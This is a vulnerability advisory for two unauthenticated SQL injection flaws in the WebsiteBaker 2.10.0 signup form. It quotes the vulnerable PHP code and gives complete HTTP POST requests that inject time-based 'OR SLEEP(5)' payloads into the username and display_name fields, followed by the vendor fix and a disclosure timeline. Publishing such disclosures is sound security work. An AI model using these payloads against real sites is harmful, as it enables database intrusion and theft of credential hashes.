WebsiteBaker 2.10.0 and lower versions are vulnerable to SQL injection vulnerabilities.
WebsiteBaker helps you to create the website you want: A free, easy and secure, flexible and extensible open source content management system (CMS).
It is possible for an unauthenticated user to inject SQL code into the variables “username” and “display_name” in the “account/signup.php” PHP script (signup form). The vulnerability exists due to insufficient filtration of user-supplied data. By exploiting this vulnerability, an attacker gains access to all records stored in the database with the privileges of the WebsiteBaker database user (e.g. administrator password MD5 hash).
Vulnerable code:
account/signup2.php
40 $username = strtolower(strip_tags($wb->get_post('username'))); <-- <strong>vstup od užívateľa</strong>
41 $display_name = strip_tags($wb->get_post('display_name')); <-- <strong>vstup od užívateľa</strong>
...
50 // Check if username already exists
51 $sql = 'SELECT `user_id` FROM `'.TABLE_PREFIX.'users` WHERE `username` = \''.$username.'\''; <-- <strong>SQL injection č.1</strong>
52 if ($database->get_one($sql)) {
53 $error[] = $MESSAGE['USERS_USERNAME_TAKEN']."\n";
54 }
55 if(!preg_match('/^[a-z]{1}[a-z0-9_-]{2,}$/i', $username)) {
56 $error[] = $MESSAGE['USERS_NAME_INVALID_CHARS']."\n";
57 }
58 $sql = 'SELECT COUNT(*) FROM `'.TABLE_PREFIX.'users` ';
59 $sql .= 'WHERE `display_name` LIKE \''.$display_name.'\''; <-- <strong>SQL injection č.2</strong>
60 if ($database->get_one($sql) > 0) {
61 $error[] = $MESSAGE['USERS_DISPLAYNAME_TAKEN'].'';
The POST parameters “username” (line 40) and “display_name” (line 41) are used unsanitized in function “get_one” (line 52 and 60) for SQL queries. No prepared statements or escaping is used.
framework/class.database.php
102 // Gets the first column of the first row
103 function get_one( $statement )
104 {
105 $fetch_row = mysqli_fetch_array(mysqli_query($this->db_handle, $statement) );
106 $result = $fetch_row[0];
107 $this->set_error(null);
108 if(mysqli_error($this->db_handle)) {
109 $this->set_error(mysqli_error($this->db_handle));
110 return null;
111 } else {
112 return $result;
113 }
114 }
SQL Injection no.1: parameter username
Payload: sql’ OR SLEEP(5)–
POST /account/signup.php HTTP/1.1
Host: localhost
Cookie: wb-5016-sid=7e753a5q6lpfp8fh24ppo9vm70
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 184
action=send&redirect=http%3A%2F%2Flocalhost&submitted_when=1490134734&email-address=&name=&full_name=username=sql' OR SLEEP(5)-- &display_name=testemail=testcaptcha=submit=Sign-up
The response will have a delay 5 seconds.
SQL Injection no.2: parameter display_name
Payload: sql’ OR SLEEP(5)–
POST /account/signup.php HTTP/1.1
Host: localhost
Cookie: wb-5016-sid=7e753a5q6lpfp8fh24ppo9vm70
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 184
action=send&redirect=http%3A%2F%2Flocalhost&submitted_when=1490134833&email-address=&name=&full_name=&username=test&<strong>display_name=sql' OR SLEEP(5)--</strong> &email=test&captcha=&submit=Sign-up
The response will have a delay 5 seconds.
Update to WebsiteBaker 2.10.1 or newer version.
24.03.2017 Informed vendor about vulnerabilities
25.03.2017 Vendor confirms and releases fixes
03.04.2017 CVE assigned
07.04.2017 Disclosed to public
These vulnerabilities were discovered by Marek Alaksa from Citadelo.